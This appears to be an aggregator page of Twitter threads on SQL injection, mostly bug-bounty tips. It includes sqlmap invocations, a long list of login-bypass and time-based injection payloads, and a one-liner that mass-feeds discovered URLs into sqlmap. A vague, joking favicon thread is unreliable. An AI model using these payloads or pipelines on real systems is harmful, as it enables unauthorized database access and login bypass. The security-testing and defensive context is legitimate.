Discover and read the best of Twitter Threads about #SQLi

Most recents (7)

😱 I asked ChatGPT "What are some of the unpopular SQL injection areas" and this is what it replied.

🧵👇

#bugbounty #cybersecurity #infosec #sqli
1. Error messages: Sometimes error messages can reveal important information about the application's database, such as table names or column names. An attacker can use this information to craft a SQL injection attack.
2. Search fields: Search fields are often overlooked when testing for SQL injection vulnerabilities, but they can be an easy target for attackers. In un-sanitized search queries, an attacker can inject SQL code to retrieve sensitive data from the database.
Read 7 tweets
Hey ReconOne fam! I've personally used Sqlmap on several occasions and it has proven to be a valuable tool in my security arsenal.

Let's dive into some of its features
👇🧵

#sqlmap #sqli #bugbountyhelp #bugbounty #AttackSurface
1/7 Sqlmap against a potentially vulnerable page

$ sqlmap -u https://example.com/page?id=1 -v 3

$ sqlmap -u https://example.com/list --data id=1

$ sqlmap -u https://example.com/internal --cookie=PHPSESSID=abcdef
2/7 Test injection in a specific parameter

$ sqlmap -u 'https://example.com/page?id=1&page=4&sort=desc&env=*'

$ sqlmap -u https://example.com/form --data 'name=asd&page=4&role=admin' -p role
Read 10 tweets
Login Bypass 🌡
#SQLi

param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#

#cybersecurity #hacking #bugbountytips #infosec

1/9 πŸ‘‡πŸΏβœ”
param=' or 1=1#
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1

This is the most classic, standard first test:

' or '1'='1

Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '

#cybersecurity #hacking #bugbountytips

2/9 πŸ‘‡πŸΏβœ”
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

3/9 πŸ‘‡πŸΏβœ”
Read 9 tweets
#Secret2
Bug Bounty with One-Line Bash Scripts 💵😎

You can mention your favorite script. I will add them to this thread.
#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
1/ #Secret2

🎯 Hunt #XSS:
πŸ‘‰πŸ» cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
πŸ‘‰πŸ» cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
2/ #Secret2

🎯 Hunt #SQLi:
πŸ‘‰πŸ»httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
Read 13 tweets
A thread on available free video resources on SQL Injection.
Retweet to share these resources with everyone.
#bugbountytips #cybersecurity #sqli
1. We can start with the SQL basics for beginners with this short video from @edurekaIN
2. We can get comprehensive knowledge about SQL Injection with the help of this video by @freeCodeCamp
Read 7 tweets
#favicons are #SVG with #XML payloads easily injected by malicious programs. #KHTML has been around for a very long time and this methodology of obfuscation has been in development since #NetscapeNavigator
What's a #favicon?
😉😄😆😅😌🥰😀😅😌🥰 lol dunno, sry bruh
Read 4 tweets
Right, #sqli or #sqlinjection.

Let's talk about it a little.

The concept is simple. Your code allows someone to place additional SQL commands in it. That "injected" code enables data access and/or system hacking (depending on the security in place).
The problem, and the solution, has been well defined since 1998.

Simply put:
Parameterize the query
Escape the input
Have proper security in place
Use correct data types

In a nutshell. There's a ton more details, but that covers the basics.
If you want a more thorough overview of what #SQLi consists of and you don't feel real nerdy at the moment, start with Wikipedia. They have it covered: en.wikipedia.org/wiki/SQL_injec…
Read 13 tweets